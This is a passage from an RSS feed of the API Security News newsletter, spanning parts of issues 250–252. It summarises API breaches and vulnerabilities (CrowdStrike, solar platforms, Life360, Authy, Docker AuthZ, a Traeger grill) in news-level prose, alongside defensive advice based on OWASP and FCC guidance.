<p>So for organizations in the Asia Pacific region that primarily use internal APIs, access control policies for east-west traffic must also be a major concern. Protecting traffic between internal APIs requires security controls deployed closer to the API than the traditional edge perimeter.</p>
<p><em><br />
Organizations in the Asia Pacific rank the OWASP API Top 10 vulnerabilities in different order than the standard list.</em></p>
<p>The top three vulnerabilities on the APAC list are:</p>
<ul>
<li>#1: Broken Authentication (API2:2023)</li>
<li>#2: SSRF (API7:2023)</li>
<li>#3: Security Misconfiguration (API8:2023).</li>
</ul>
<p>Interestingly, priorities also differ across countries. For example, Malaysian organizations report that API3 (Broken Object Property Level Authorization) is the top risk, while New Zealand is more concerned about API10 (Unsafe Consumption of APIs).</p>
<p>So while OWASP API Top 10 list is a useful and relevant model, API security solutions must be both comprehensive and flexible to cover the different needs and priorities of organizations in the Asia Pacific region.</p>
<p><em><span style="font-weight: 400;"><br />
Data leakage is the top priority for API runtime protection </span></em></p>
<p><span style="font-weight: 400;">Previous incidents discussed in this newsletter, such as the </span><a href="https://apisecurity.io/issue-240-spoutible-api-leakage-15m-trello-profiles-scraped-api-secret-tokens-leaked/" target="_blank" rel="noopener"><span style="font-weight: 400;">Spoutible API incident</span></a><span style="font-weight: 400;"><span style="font-weight: 400;"><span style="font-weight: 400;">, demonstrate why data leakage is such a critical concern, and why authorization checks should be performed on both API request and response messages.</span></span></span></p>
<p>API security often focuses primarily on threats from inbound requests. But even if you do all the work to harden and protect your APIs from outside attacks, those APIs can still leak sensitive data in very damaging ways, through development errors or  inadequate authorization policies.</p>
<p>So this is a positive sign that organizations in the Asia Pacific region are recognizing and prioritizing risk on both sides of the API transaction, to address both inbound malicious attacks and outbound data leakage.</p>
<h2><span style="font-weight: 400;">Article: Salutary lessons for management teams everywhere </span></h2>
<p style="font-weight: 400;"><span style="font-weight: 400;">Crowdstrike has been in the news for all the wrong reasons recently. On July 18, a software update containing a critical bug was distributed globally by Crowdstrike, causing millions of Windows machines worldwide to crash and fail to restart. Some </span><a href="https://www.theguardian.com/australia-news/article/2024/jul/19/microsoft-windows-pcs-outage-blue-screen-of-death" target="_blank" rel="noopener"><span style="font-weight: 400;">media reports</span></a><span style="font-weight: 400;"> have called this incident the largest outage in the history of information technology.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">As the fallout continues for affected customers and for Crowdstrike, there are important lessons to be learned for management teams who want to avoid testifying before the U.S. Congress about their internal software testing and deployment processes…or lack thereof.    </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">As </span><a href="https://www.theregister.com/2024/08/01/crowdstrike_lawsuit/" target="_blank" rel="noopener"><span style="font-weight: 400;">this article</span></a><span style="font-weight: 400;"> by The Register reports, in response to Crowdstrike’s promises to begin implementing practices like canary testing to prevent future disasters, angry investors were quick to point out that the company should have done canary testing in the first place. A class-action lawsuit filed by investors against Crowdstrike soon followed.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">If you’re not familiar with the term, “canary testing” (sometimes called canary deployment) is the practice of releasing a new software update to a small subset of users initially, and then gradually releasing the update to all users. The benefit of this approach is that it allows users to test the latest version of the software, and in doing so catches critical flaws before the updates are released to a wider user base. If flaws are discovered and reported during the initial canary testing, damage is significantly limited to a small select subset of users. </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">This process of course also applies to pushing out updates to your API. So if your team hasn’t implemented this practice yet, don’t wait for the canaries to come home to roost.</span></p>
<h2><span style="font-weight: 400;">Vulnerability: OWASP API vulnerabilities in Solar Platforms</span></h2>
<p style="font-weight: 400;"><span style="font-weight: 400;">As concerns about the impact of climate change continue to grow, we could expect to see increased investment and reliance on alternative energy sources around the world. Worryingly, the security of those new energy systems and their potential vulnerability to cyberattacks is being called into question by </span><a href="https://www.bitdefender.com/blog/labs/60-hurts-per-second-how-we-got-access-to-enough-solar-power-to-run-the-united-states/" target="_blank" rel="noopener"><span style="font-weight: 400;">this report</span></a><span style="font-weight: 400;"> from a research team at BitDefender.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">The report describes how critical API vulnerabilities were recently discovered in products from two of the world&#8217;s largest solar management platform manufacturers. The vulnerabilities discovered correspond to the top three vulnerabilities in the OWASP API Top 10 list:</span></p>
<ul style="font-weight: 400;">
<li style="font-weight: 400;" aria-level="1"><a href="https://owasp.org/API-Security/editions/2023/en/0xa1-broken-object-level-authorization/" target="_blank" rel="noopener"><span style="font-weight: 400;">API1:2023 Broken Object Level Authorization</span></a></li>
<li style="font-weight: 400;" aria-level="1"><a href="https://owasp.org/API-Security/editions/2023/en/0xa2-broken-authentication/" target="_blank" rel="noopener"><span style="font-weight: 400;">API2:2023 Broken Authentication</span></a></li>
<li style="font-weight: 400;" aria-level="1"><a href="https://owasp.org/API-Security/editions/2023/en/0xa3-broken-object-property-level-authorization/" target="_blank" rel="noopener"><span style="font-weight: 400;">API3:2023 Broken Object Property Level Authorization</span></a></li>
</ul>
<p style="font-weight: 400;"><span style="font-weight: 400;">We should not be surprised to learn that APIs are being used in these safety-critical systems, as APIs facilitate interoperability between solar platforms and connected equipment from various manufacturers.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">However, the security and reliability of critical systems should be paramount, and it is disconcerting that these platform APIs are vulnerable to authentication and authorization attacks that could potentially impact millions of people. </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">The Bitdefender team should be commended for ethically discovering and reporting the API vulnerabilities to both vendors. However, the incident raises serious questions about regulations, standards, and practices for developing API for solar power devices. </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">Other industries such as the Automotive industry have already </span><a href="https://42crunch.com/buckle-up-and-protect-your-ride-the-importance-of-api-security-for-the-connected-vehicle/" target="_blank" rel="noopener"><span style="font-weight: 400;">established standards</span></a><span style="font-weight: 400;"> mandating cybersecurity and API protection for vehicle manufacturing. Similar standards are clearly needed to protect our critical energy infrastructure in the future. </span></p>
<h2><span style="font-weight: 400;">Vulnerability: Siemens React app missing API authorization</span></h2>
<p style="font-weight: 400;"><span style="font-weight: 400;">A research team recently discovered a vulnerability in a React app from Siemens which allowed them to bypass the app&#8217;s client authentication and retrieve unauthorized data from the API. </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">According to the team’s </span><a href="https://thenewstack.io/plug-security-holes-in-react-apps-that-can-lead-to-api-exploitation/" target="_blank" rel="noopener"><span style="font-weight: 400;">report</span></a><span style="font-weight: 400;">, the API failed to enforce authorization on the applications requests, trusting instead that the app had already authenticated and authorized the user on the client side before making the API requests. This is a critical error in API development.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">A React single page application (SPA) is typically developed as a combination of a client-side UI component that renders a display in the user&#8217;s browser, and a server-side API that provides data to the client UI as needed…and hopefully as authorized.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">It is important to note that data returned by an API to the client can be exposed, even if it is not displayed in the client UI. For example, an attacker can easily bypass the client and interact directly with the API. For this reason, SPAs should never perform client-side authentication or authorization. Instead, all data requests should be authorized by an API, and an API should only return necessary and authorized data to the client-side application.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">This is a fairly common mistake made by app developers, and can expose an organization to unauthorized access to data. We recently reported on a similar case in the </span><span style="font-weight: 400;">newsletter</span><span style="font-weight: 400;">, where<a href="https://apisecurity.io/issue-248-api-penetration-of-apps-and-modems-graphql-and-its-discontents-api-security-for-supply-chain-and-automotive/" target="_blank" rel="noopener"> two curious students from Santa Cruz managed to hack into a national network of washing machines</a>. API hygiene indeed!</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">To protect against similar vulnerabilities in your Angular or React applications, test APIs directly to ensure that a valid credential or access token is always required by the API before returning private data. Additionally, limit the data returned by the API to what is necessary and authorized for each client request, to avoid exposing excessive data to the client. </span></p>
<h2><span style="font-weight: 400;">Report: Cost of data breaches rises to USD 4.88 million</span></h2>
<p style="font-weight: 400;"><span style="font-weight: 400;">A Ponemon Institute </span><a href="https://www.ibm.com/downloads/cas/1KZ3XE9D" target="_blank" rel="noopener"><span style="font-weight: 400;">study</span></a><span style="font-weight: 400;"> of 604 organizations affected by data breaches between March 2023 and February 2024 found a 10% increase in the average cost of a data breach over the past year. The average cost to an organization is now USD 4.88 million.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">One of the biggest factors that influences the cost of a breach is the time it takes to identify and contain the breach. We noted the following statistics from the study:</span></p>
<ul style="font-weight: 400;">
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">The mean time to identify a breach is 194 days</span></li>
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">The mean time to contain an identified breach is 64 days</span></li>
</ul>
<p style="font-weight: 400;"><span style="font-weight: 400;">This suggests the greatest opportunity to reduce the overall cost of a data breach lies in early identification, and the report also indicates which actors typically identify a breach: the organization, the attacker, or an ethical third party. </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">It is therefore worth noting that it is in the best interest of organizations to facilitate a formal process and communication channel so that external researchers can disclose vulnerabilities in an ethical manner. This is not always the case, and some researchers have in the past expressed frustration when </span><a href="https://www.troyhunt.com/the-state-of-data-breaches/" target="_blank" rel="noopener"><span style="font-weight: 400;">trying to disclose their findings</span></a><span style="font-weight: 400;"> to an organization.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">Something as basic and relatively inexpensive as a dedicated contact address or secure channel that is easy for researchers to find and quick in response, could save an organization millions of dollars by leveraging the help from external parties to reduce the mean time to identify a data breach.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">The study also found that stolen credentials were the most common attack vector in 2024, used by attackers in 16% of all data breaches. This is an important point for API teams, as an </span><a href="https://www.imperva.com/resources/resource-library/reports/2024-bad-bot-report/" target="_blank" rel="noopener"><span style="font-weight: 400;">Imperva report</span></a><span style="font-weight: 400;"> from this year also found that 44% of all automated attacks aimed at  compromising user credentials target APIs. </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">APIs therefore remain a prominent target for attackers and require reliable and effective API security to avoid the costs of data breaches.</span></p>
<h2><span style="font-weight: 400;">Breach: Tencent incident highlights consequences of data leaks</span></h2>
<p style="font-weight: 400;"><span style="font-weight: 400;">A hacker has released the account information of more than 1.4 billion users, claiming that the data came from Chinese tech company Tencent. Researchers at <a href="https://hackread.com/" target="_blank" rel="noopener">Hackread.com</a> believe the data may have come from a massive data breach discovered in January this year.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">In </span><a href="https://hackread.com/hackers-leak-1-4-billion-tencent-user-accounts-online/" target="_blank" rel="noopener"><span style="font-weight: 400;">this latest report</span></a><span style="font-weight: 400;">, the research team lists the potential consequences that companies can face if customer data is stolen and exposed. This list can be a useful resource for a security professional looking to convince the management team to increase the security budget. </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">The list of negative consequences for an organization includes:</span><span style="font-weight: 400;"><br />
</span></p>
<ul style="font-weight: 400;">
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">privacy violations</span></li>
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">reputational damage</span></li>
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">financial impact</span></li>
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">regulatory scrutiny</span></li>
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">increased cybersecurity risks</span></li>
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">impact on users </span></li>
</ul>
<p style="font-weight: 400;"><span style="font-weight: 400;">Are there any other potential implications not mentioned here? You can email your ideas or suggestions to <a class="c-link" href="mailto:editor@42crunch.com" target="_blank" rel="noopener noreferrer" aria-haspopup="menu">editor@42crunch.com</a></span></p>
<p>The post <a href="https://apisecurity.io/issue-252-api-security-in-apac-crowdstrike-and-canary-tests-api-vulnerabilities-in-solar-platforms-and-react-apps-costs-of-a-data-breach/">Issue 252: API Security in APAC, Crowdstrike and canary tests, API vulnerabilities in solar platforms and React apps, Costs of a data breach</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Issue 251: FCC mandates API security, API vulnerabilities in dating apps and Docker plugins, Life360 API data leak</title>
		<link>https://apisecurity.io/issue-251-fcc-mandates-api-security-api-vulnerabilities-in-dating-apps-and-docker-plugins-life360-api-data-leak/</link>
		
		<dc:creator><![CDATA[Mark Dolan]]></dc:creator>
		<pubDate>Thu, 01 Aug 2024 15:33:11 +0000</pubDate>
				<category><![CDATA[Newsletter Archive]]></category>
		<guid isPermaLink="false">https://apisecurity.io/?p=11179</guid>

					<description><![CDATA[<p>This week, we review the API security controls outlined by the FCC to prevent data breaches and examine multiple incidents of API data leaks exposing users’ personal data. We also cover a case of unsafe API consumption in the Docker ecosystem. Report: FCC weighs in with API security requirements The U.S. Federal Communications Commission (FCC) [...]</p>
<p><a class="btn btn-secondary understrap-read-more-link" href="https://apisecurity.io/issue-251-fcc-mandates-api-security-api-vulnerabilities-in-dating-apps-and-docker-plugins-life360-api-data-leak/">Read More...</a></p>
<p>The post <a href="https://apisecurity.io/issue-251-fcc-mandates-api-security-api-vulnerabilities-in-dating-apps-and-docker-plugins-life360-api-data-leak/">Issue 251: FCC mandates API security, API vulnerabilities in dating apps and Docker plugins, Life360 API data leak</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p style="font-weight: 400;"><span style="font-weight: 400;">This week, we review the API security controls outlined by the FCC to prevent data breaches and examine multiple incidents of API data leaks exposing users’ personal data. We also cover a case of unsafe API consumption in the Docker ecosystem.</span></p>
<h2><span style="font-weight: 400;">Report: FCC weighs in with API security requirements</span></h2>
<p style="font-weight: 400;"><span style="font-weight: 400;">The U.S. Federal Communications Commission (FCC) has established a list of API security controls as part of a mandatory information security program at Tracfone, a wireless service provider. The company was also fined $16 million in connection with a series of data breaches that exposed its customers’ personal information.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">The details of the mandated security program are included in a </span><a href="https://docs.fcc.gov/public/attachments/DA-24-481A1.pdf" target="_blank" rel="noopener"><span style="font-weight: 400;">consent decree</span></a><span style="font-weight: 400;"> issued by the FCC, which specifically emphasizes the paramount importance of API security. Some of the highlights include:</span></p>
<ul style="font-weight: 400;">
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">All input and output data validated and sanitized to prevent injection vulnerabilities</span></li>
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">All output data validated and authorized to avoid excessive data exposures</span></li>
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">All data securely communicated over an encrypted channel (e.g. TLS sessions)</span></li>
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">Numeric identifiers generated to be unpredictable (helps to avoid BOLA exploits)</span></li>
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">Check for the vulnerabilities listed in the OWASP API Security Top 10 List </span></li>
</ul>
<p style="font-weight: 400;"><span style="font-weight: 400;">The list of security controls compiled by the FCC can be a useful reference for other API teams who wish to implement a security program to prevent costly API vulnerabilities. </span></p>
<h2><span style="font-weight: 400;">Vulnerability: Dating Apps highlight risk of client-side data filtering</span></h2>
<p style="font-weight: 400;"><span style="font-weight: 400;">An article on the </span><a href="https://www.darkreading.com/application-security/swipe-right-for-data-leaks-dating-apps-expose-location-more" target="_blank" rel="noopener"><span style="font-weight: 400;">Dark Reading website</span></a><span style="font-weight: 400;"> reveals how popular dating apps leak sensitive user information in API response messages, drawing a contrast between the filtered data displayed in the app UI and the unfiltered, more sensitive data returned by the API.  </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">An example given in the report describes a user choosing to display their age in the app, while the API returns the user&#8217;s full date of birth to the app. This exposes more information than the user intended if you know where to look (hint: hackers know where to look).  </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">APIs should only return data that is necessary and authorized for a request. Some API developers return data generically and leave it up to the client to determine what data to show or hide based on, for example, the end user’s privacy settings. </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">This is a mistake because it is often easy for an attacker to bypass a client-side application and access the raw data returned by an API. The golden rule is to never rely on the client to filter sensitive data. Instead, make sure the API only returns necessary and authorized data.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">The OWASP </span><a href="https://owasp.org/API-Security/editions/2023/en/0xa3-broken-object-property-level-authorization/#how-to-prevent" target="_blank" rel="noopener"><span style="font-weight: 400;">documentation</span></a><span style="font-weight: 400;"> on broken object property level authorization recommends a number of API development practices to avoid excessive data exposure:</span></p>
<ul style="font-weight: 400;">
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">When exposing an object using an API endpoint, always make sure that the user should have access to the object&#8217;s properties you expose.</span></li>
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">Implement a schema-based response validation mechanism as an extra layer of security. As part of this mechanism, define and enforce data returned by all API methods.</span></li>
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">Keep returned data structures to the bare minimum, according to the business/functional requirements for the endpoint.</span><span style="font-weight: 400;"><br />
</span></li>
</ul>
<h2><span style="font-weight: 400;">Breach: Life360 API leaks personal data of 400,000 customers</span></h2>
<p style="font-weight: 400;"><span style="font-weight: 400;">Continuing on the topic of APIs leaking sensitive data, a recent </span><a href="https://www.cpomagazine.com/cyber-security/life360-database-leak-from-unsecured-login-api-impacts-over-440000-customers/" target="_blank" rel="noopener"><span style="font-weight: 400;">article</span></a><span style="font-weight: 400;"> in CPO Magazine describes how login attempts on the mobile tracking app Life360 returned excessive data in the API response, including the name and mobile phone number of unauthenticated users. </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">A hacker exploited this vulnerability to compile a list of personal information on more than 400,000 Life360 customers. The method used to exploit the vulnerability appears to follow a similar pattern to other industry cases we have covered recently, such as mass data scraping at </span><a href="https://apisecurity.io/issue-250-authy-api-breach-us-agencies-push-secure-by-design-apis-grill-iot-devices-shares-by-our-readers/" target="_blank" rel="noopener"><span style="font-weight: 400;">Authy</span></a><span style="font-weight: 400;"> and </span><a href="https://42crunch.com/api-security-data-breaches-review-h1-2024/" target="_blank" rel="noopener"><span style="font-weight: 400;">Trello</span></a><span style="font-weight: 400;">. In each of these incidents a hacker iterates through a list of stolen email addresses, sending each as input to the API one by one. If an account exists for a given email address, the vulnerable API returns personal information about the user.  </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">The article states that the exploit occurred while “attempting” logins. This suggests that the API response containing the sensitive data was actually an error response (e.g. HTTP 401), which should remind API teams to continually test and validate the contents of API success and error responses, since both can be vulnerable to leaking sensitive information.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">The article also highlights how the exposed information was not visible to a user through the mobile app’s UI, but could be found behind the scenes in the API response (sound familiar?). The fact that hackers can so easily bypass the app UI and delve into the API traffic, highlights again the importance of testing our APIs directly to ensure that developers apply appropriate constraints to the API response. </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">Validating users&#8217; personal information at the app UI level is not sufficient, as it can hide the leakage of unauthorized information that occurs from the API.</span></p>
<h2><span style="font-weight: 400;">Vulnerability: Docker AuthZ plugin and unsafe API consumption</span></h2>
<p style="font-weight: 400;"><span style="font-weight: 400;">According to </span><a href="https://www.theregister.com/2024/07/25/5yo_docker_vulnerability/" target="_blank" rel="noopener"><span style="font-weight: 400;">a report</span></a><span style="font-weight: 400;"> by The Register, a vulnerability in Docker&#8217;s AuthZ plugin allows users to bypass authorization using a specially crafted API request with Content-Length set to 0.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">The authorization process involves a </span><a href="https://docs.docker.com/engine/extend/plugins_authorization/" target="_blank" rel="noopener"><span style="font-weight: 400;">sequence of API calls</span></a><span style="font-weight: 400;"> between a client, the Docker daemon, and the AuthZ plugin. A client sends an API request to the Docker daemon, which in turn sends an API request to the AuthZ plugin. The AuthZ plugin uses content in the API request body to decide whether a user’s request should be allowed or denied.</span></p>
<p><img loading="lazy" decoding="async" class="alignnone wp-image-11183" src="https://apisecurity.io/wp-content/uploads/2024/08/Issue-251-image-300x221.png" alt="" width="600" height="442" srcset="https://apisecurity.io/wp-content/uploads/2024/08/Issue-251-image-300x221.png 300w, https://apisecurity.io/wp-content/uploads/2024/08/Issue-251-image.png 512w" sizes="auto, (max-width: 600px) 100vw, 600px" /></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">The vulnerability occurs when the body of the request to the AuthZ plugin is empty and does not contain any authorization information. In this case, the AuthZ plugin apparently authorized the request from the Docker daemon by default; which is strange behavior for a security control. </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">I think the AuthZ plugin API was probably implemented to always expect valid authorization content from the Docker daemon. An unsafe assumption if that is the case, since the Docker daemon was vulnerable to a malicious API request from the client, which it then passed on to the AuthZ plugin. </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">The OWASP </span><a href="https://owasp.org/API-Security/editions/2023/en/0xaa-unsafe-consumption-of-apis/#is-the-api-vulnerable" target="_blank" rel="noopener"><span style="font-weight: 400;">guideline</span></a><span style="font-weight: 400;"> for the “unsafe consumption of APIs” vulnerability highlights that this is a common mistake developers make when the input data comes from a well-known source: </span></p>
<blockquote>
<p style="font-weight: 400;"><span style="font-weight: 400;">“Developers tend to trust data received from third-party APIs more than user input. </span></p>
</blockquote>
<p style="font-weight: 400;"><span style="font-weight: 400;">This is especially true for APIs offered by well-known companies”</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">All input data processed by an API, regardless of its source, must be validated before use to ensure it conforms to expectations of functionality and access control. Or, to put it more succinctly, verify don’t trust. </span></p>
<p>The post <a href="https://apisecurity.io/issue-251-fcc-mandates-api-security-api-vulnerabilities-in-dating-apps-and-docker-plugins-life360-api-data-leak/">Issue 251: FCC mandates API security, API vulnerabilities in dating apps and Docker plugins, Life360 API data leak</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Issue 250: Authy API breach, US agencies push secure by design, APIs grill IoT devices, shares by our readers</title>
		<link>https://apisecurity.io/issue-250-authy-api-breach-us-agencies-push-secure-by-design-apis-grill-iot-devices-shares-by-our-readers/</link>
		
		<dc:creator><![CDATA[Mark Dolan]]></dc:creator>
		<pubDate>Thu, 18 Jul 2024 12:07:39 +0000</pubDate>
				<category><![CDATA[Newsletter Archive]]></category>
		<guid isPermaLink="false">https://apisecurity.io/?p=11171</guid>

					<description><![CDATA[<p>This week, an Authy API was misused to verify the registered phone numbers of millions of users and recent injection attacks are prompting US security agencies to promote secure by design for software development. A research team demonstrates IoT hacking via API. As this is a significant milestone for 42Crunch and APIsecurity.io, namely our 250th [...]</p>
<p><a class="btn btn-secondary understrap-read-more-link" href="https://apisecurity.io/issue-250-authy-api-breach-us-agencies-push-secure-by-design-apis-grill-iot-devices-shares-by-our-readers/">Read More...</a></p>
<p>The post <a href="https://apisecurity.io/issue-250-authy-api-breach-us-agencies-push-secure-by-design-apis-grill-iot-devices-shares-by-our-readers/">Issue 250: Authy API breach, US agencies push secure by design, APIs grill IoT devices, shares by our readers</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p style="font-weight: 400;"><span style="font-weight: 400;">This week, an Authy API was misused to verify the registered phone numbers of millions of users and recent injection attacks are prompting US security agencies to promote secure by design for software development. A research team demonstrates IoT hacking via API.<br />
</span></p>
<p>As this is a significant milestone for 42Crunch and APIsecurity.io, namely our 250th issue, we are starting a new initiative. We’re inviting readers to share articles you’ve read that you feel merit inclusion in the newsletter. You can submit <a href="mailto:editor@42crunch.com">suggestions via email here</a>.  This week we feature two interesting articles from our APISecurity.io readers.</p>
<h2><span style="font-weight: 400;">Breach: Another unsecured API vulnerable to mass data scraping </span></h2>
<p style="font-weight: 400;"><span style="font-weight: 400;">In a </span><a href="https://www.bleepingcomputer.com/news/security/hackers-abused-api-to-verify-millions-of-authy-mfa-phone-numbers/" target="_blank" rel="noopener"><span style="font-weight: 400;">report</span></a><span style="font-weight: 400;"> released earlier this month, Authy, a provider of two-factor authentication (2FA) solutions, confirmed how a threat actor used an unauthenticated API to verify millions of users’ phone numbers registered with Authy to generate one-time passwords. </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">This incident is similar to another recent case of mass data scraping via Trello’s API, which I covered in depth in a recent </span><a href="https://42crunch.com/api-security-data-breaches-review-h1-2024/" target="_blank" rel="noopener"><span style="font-weight: 400;">42Crunch webinar</span></a><span style="font-weight: 400;">. Both incidents have common characteristics to avoid in your own API development: </span></p>
<ol style="font-weight: 400;">
<li aria-level="1">An API that does not require authentication. This means a malicious user can easily abuse the API without first creating an account.</li>
<li aria-level="1">An API that does not enforce authorization. So, a user can retrieve account information about other users.</li>
<li aria-level="1">An API that accepts an identifier like a phone number or email address and, if found, returns the user’s account information. This allows a malicious user to verify the existence of a user account for a given identifier.</li>
<li aria-level="1">An API that does not enforce rate limiting, or where rate-limits can be bypassed. This puts the mass into mass data scraping!</li>
</ol>
<p style="font-weight: 400;"><span style="font-weight: 400;">An API that returns user account information should apply authorization and rate-limiting controls, to limit the information to authorized users and use cases only. </span></p>
<h2><span style="font-weight: 400;">Vulnerability: Injection attacks prompt calls for ‘secure by design’</span></h2>
<p style="font-weight: 400;"><span style="font-weight: 400;">In a </span><a href="https://cybersecuritynews.com/cisa-warns-of-hackers-exploiting-os-command-injection/" target="_blank" rel="noopener"><span style="font-weight: 400;">recent alert</span></a><span style="font-weight: 400;">, leading security agencies in the United States are urging teams to adopt the ‘secure by design’ principle for software development as a more effective way to prevent injection vulnerabilities. This follows a number of successful </span><a href="https://portswigger.net/web-security/os-command-injection" target="_blank" rel="noopener"><span style="font-weight: 400;">OS command injection attacks</span></a><span style="font-weight: 400;"> that have targeted and compromised network edge devices. </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">OS command injection is similar to other injection vulnerabilities, such as SQL injection, XPath injection and cross-site scripting, all of which involve the injection of malicious input causing unexpected or unauthorized behavior in the target. These vulnerabilities are also commonly found in APIs and are the cause of significant API breaches.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;"><a href="https://cheatsheetseries.owasp.org/cheatsheets/Input_Validation_Cheat_Sheet.html" target="_blank" rel="noopener">Recommended solutions</a> to prevent injection attacks focus on limiting, sanitizing, and properly validating user input. The goal is to distinguish between good and bad input, and ensure only the good input gets through.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">The benefit of a secure-by-design approach is that it enables teams to define in advance the type, format, structure and range of valid values that can be expected from user input. This early definition ensures that reliable security rules can be built into the code, verified by testing teams, and monitored for compliance by security and operations teams as the code is deployed to production.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">Secure by design is the most effective way to protect software, including APIs, from injection vulnerabilities that constantly expose organizations to cybersecurity attacks. This also appears to be the conclusion of major US security agencies.</span></p>
<h2><span style="font-weight: 400;">Vulnerability: API Security raising the &#8220;steaks&#8221; for IoT</span></h2>
<p style="font-weight: 400;"><span style="font-weight: 400;">A broken authorization vulnerability in the API of a Traeger Grill (yes, you can now cook your steak by API) allowed a malicious user to remotely control other users’ grills. </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">That’s the </span><a href="https://bishopfox.com/blog/traeger-wifi-controller-advisory" target="_blank" rel="noopener"><span style="font-weight: 400;">discovery</span></a><span style="font-weight: 400;"> of Bishop Fox’s Nick Cerne, who explained how his team managed to hack a grill registration API to remotely take control of a grill belonging to a colleague and then adjust the grill’s temperature to maximum setting. </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">In this case, ownership was identified only via a grill ID that could be retrieved from a sticker physically located on the grill. Additional security measures included a device-generated certificate, but this was not enforced by the API and so the ID alone was sufficient to control the device.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">Using a grill ID as the sole means of authorization is comparable to using API keys for the same purpose. This assumes that the legitimate holder of the key (or grill sticker) has the motivation and means to keep it private from other users; despite a long history of API keys being hardcoded into apps, transmitted without encryption, or accidentally pushed to Github.  </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">So, although the potential impact here was limited to burnt food and some frustrated grillers, this case highlights the importance of sufficient and effective authorization controls in APIs. </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">Hopefully the report will provide your API team with some food for thought.</span></p>
<h2><span style="font-weight: 400;">Reader’s Share: API Security and the Circuit Breaker pattern</span></h2>
<p style="font-weight: 400;"><span style="font-weight: 400;">This informative</span><a href="https://nevatech.com/blog/post/API-Gateway-and-Message-Processing-Workflows-Circuit-Breaker-pattern" target="_blank" rel="noopener"><span style="font-weight: 400;"> blog post</span></a><span style="font-weight: 400;"> describes the circuit breaker pattern for APIs and the options for its implementation.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">Circuit breaker is a design pattern for APIs that protects backend infrastructure from a flood of API requests when a component such as a database or remote service temporarily goes down. Essentially, this pattern prevents API requests from overloading the backend and allows the failing component the opportunity to recover and resume service. </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">When backend infrastructure fails, it can also expose vulnerabilities in an API&#8217;s error handling. If infrastructure details are unintentionally disclosed in the API’s response to the client, a malicious actor can launch more targeted attacks on a system. Again, the circuit breaker pattern could potentially prevent such leaks by temporarily separating the API and its response from the failing backend component.</span></p>
<p><span style="color: #808080;"><span style="font-weight: 400;">Thank you to Nevatek’s </span><span style="font-weight: 400;">Andrew Slivker</span><span style="font-weight: 400;"> for the share!</span></span></p>
<h2><span style="font-weight: 400;">Reader’s Share: Deactivating an API, One Step at a Time</span></h2>
